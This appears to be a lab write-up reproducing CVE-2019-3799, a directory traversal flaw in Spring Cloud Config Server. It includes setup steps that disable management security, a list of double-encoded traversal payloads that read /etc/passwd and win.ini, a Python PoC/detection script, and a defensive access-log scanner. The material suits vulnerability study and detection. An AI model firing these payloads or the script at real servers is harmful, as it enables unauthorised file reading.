1. Download a vulnerable version of Spring Cloud Config:
https://github.com/spring-cloud/spring-cloud-config/releases
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
2. After downloading, open the project in IDEA and build it with Maven:
Since I am not familiar with Java Spring myself, after loading the project I simply clicked "run",
but it kept reporting an error:
2019-07-16 23:37:15.984 INFO 20988 — [ main] c.c.c.ConfigServicePropertySourceLocator : Fetching config from server at: http://localhost:8888
2019-07-16 23:37:17.175 WARN 20988 — [ main] c.c.c.ConfigServicePropertySourceLocator : Could not locate PropertySource: I/O error on GET request for “http://localhost:8888/bar/default”: Connection refused: connect; nested exception is java.net.ConnectException: Connection refused: connect
I searched a lot online and everything said it was a configuration problem. Later I asked SN, and the likely cause was that the wrong module was being run, because what we are testing is the server-side vulnerability.
(1) Following the official site:
$ cd spring-cloud-config-server
$ ../mvnw spring-boot:run
(2) Or, in IDEA, select \spring-cloud-config-server\src\main\java\org\springframework\cloud\config\server\ConfigServerApplication.java
and click Run:
Testing and checking:
The warning is gone now, but there is a Tomcat error at the bottom; it does not affect anything, and I do not know the exact reason:
java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:428) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:687) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:790) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1468) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [na:1.8.0_191]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [na:1.8.0_191]
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_191]
Testing access to http://127.0.0.1:8888/admin/info works fine.
Accessing http://127.0.0.1:8888/admin/env returns 401:
A 401 is an authentication problem. After looking it up, the file that needs to be modified is:
\spring-cloud-config-1.4.4.RELEASE\spring-cloud-config-server\src\main\resources\configserver.yml
The default contents are:
info:
  component: Config Server
spring:
  application:
    name: configserver
  autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration
  jmx:
    default_domain: cloud.config.server
  cloud:
    config:
      server:
        git:
          uri: https://github.com/spring-cloud-samples/config-repo
          repos:
            - patterns: multi-repo-demo-*
              uri: https://github.com/spring-cloud-samples/config-repo
server:
  port: 8888
management:
  context_path: /admin
Under the management node, add:
  security:
    enabled: false
After the change it reads:
info:
  component: Config Server
spring:
  application:
    name: configserver
  autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration
  jmx:
    default_domain: cloud.config.server
  cloud:
    config:
      server:
        git:
          uri: https://github.com/spring-cloud-samples/config-repo
          repos:
            - patterns: multi-repo-demo-*
              uri: https://github.com/spring-cloud-samples/config-repo
server:
  port: 8888
management:
  security:
    enabled: false
  context_path: /admin
Run it again and it works:
(3) Testing arbitrary file read:
Set the request header Accept: text/html,application/xhtml+xml,application/xml;q=0.9,application/octet-stream,image/webp,image/apng,*/*;q=0.8
Main payloads:
http://xxx:8888/a/b/master/ + {..%252F}*2 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*6 + Windows%252Fwin.ini
http://xxx:8888/a/b/master/ + {..%252F}*50 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*50 + Windows%252Fwin.ini
http://xxx:8888/a/b/c/ + {..%252F}*3 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*7 + Windows%252Fwin.ini?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + Windows%252Fwin.ini?useDefaultLabel=a
Detection script:
#coding=utf-8
'''
Author: c0ny1
Date: 2019-04-20 16:41
Description: Directory Traversal with spring-cloud-config-server(CVE-2019-3799)
Affected Pivotal Products and Versions:
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
Older unsupported versions are also affected
'''
import requests

# Strings expected in the response body when the file read succeeds
WIN_CHECK_KEYWORD = '[extensions]'
LINUX_CHECK_KEYWORD = 'root:'


def init_poc():
    pocs = []
    payload = '/a/b/master/' + '..%252F'*2 + 'etc%252Fpasswd'
    poc = {'payload': payload, 'keyword': LINUX_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/master/' + '..%252F'*6 + 'Windows%252Fwin.ini'
    poc = {'payload': payload, 'keyword': WIN_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/master/' + '..%252F'*50 + 'etc%252Fpasswd'
    poc = {'payload': payload, 'keyword': LINUX_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/master/' + '..%252F'*50 + 'Windows%252Fwin.ini'
    poc = {'payload': payload, 'keyword': WIN_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/c/' + '..%252F'*3 + 'etc%252Fpasswd?useDefaultLabel=a'
    poc = {'payload': payload, 'keyword': LINUX_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/c/' + '..%252F'*7 + 'Windows%252Fwin.ini?useDefaultLabel=a'
    poc = {'payload': payload, 'keyword': WIN_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/c/' + '..%252F'*50 + 'etc%252Fpasswd?useDefaultLabel=a'
    poc = {'payload': payload, 'keyword': LINUX_CHECK_KEYWORD}
    pocs.append(poc)
    payload = '/a/b/c/' + '..%252F'*50 + 'Windows%252Fwin.ini?useDefaultLabel=a'
    poc = {'payload': payload, 'keyword': WIN_CHECK_KEYWORD}
    pocs.append(poc)
    return pocs


pocs = init_poc()


def poc(url):
    if url.endswith('/'):
        url = url[:-1]  # strip trailing /
    for p in pocs:
        target_url = url + p.get('payload')
        try:
            r = requests.get(target_url, timeout=10)
        except requests.RequestException:
            continue
        # r.text (str) rather than r.content (bytes) so the check also works on Python 3
        if r.status_code == 200 and p.get('keyword') in r.text:
            return True
    return False
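The same double-encoded "..%252F" pattern seen from the defender's side, as an added example that is not part of the original post or of c0ny1's script: a small Python scanner over constructed access-log lines that percent-decodes request paths repeatedly, the way the vulnerable server ends up doing, and flags the traversal requests the payload list above describes so they can be hunted in reverse-proxy or Tomcat access logs. The log lines, client IPs and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). Lines 1, 2
# and 5 carry the double-encoded "..%252F" the vulnerable server decodes twice.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jul/2019:23:40:01 +0800] "GET /a/b/master/..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1843
10.0.0.5 - - [16/Jul/2019:23:40:02 +0800] "GET /a/b/c/..%252F..%252F..%252FWindows%252Fwin.ini?useDefaultLabel=a HTTP/1.1" 200 92
10.0.0.7 - - [16/Jul/2019:23:40:03 +0800] "GET /foo/default HTTP/1.1" 200 512
10.0.0.7 - - [16/Jul/2019:23:40:04 +0800] "GET /admin/info HTTP/1.1" 200 44
10.0.0.9 - - [16/Jul/2019:23:40:05 +0800] "GET /a/b/master/%2e%2e%252F%2e%2e%252Fetc%252Fpasswd HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def fully_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), mirroring
    the repeated decoding that turns ..%252F into ../ on the server side."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_traversal(target):
    """True if the fully decoded path has a '..' segment, or if it was still
    percent-encoded after one decoding pass (double encoding is itself a red flag)."""
    path = target.split('?', 1)[0]
    decoded = fully_decode(path)
    segments = re.split(r'[\\/]+', decoded)
    return '..' in segments or decoded != unquote(path)


def scan_access_log(text):
    """Return (line_no, client, target, status) for every suspicious request;
    a 200 on a flagged line means the file was most likely served."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group('target')):
            hits.append((n, line.split(' ', 1)[0], m.group('target'), int(m.group('status'))))
    return hits


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print('line %d: %s -> %s (HTTP %d)' % hit)
```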
Referring to the analysis by c0ny1 on gv7.me,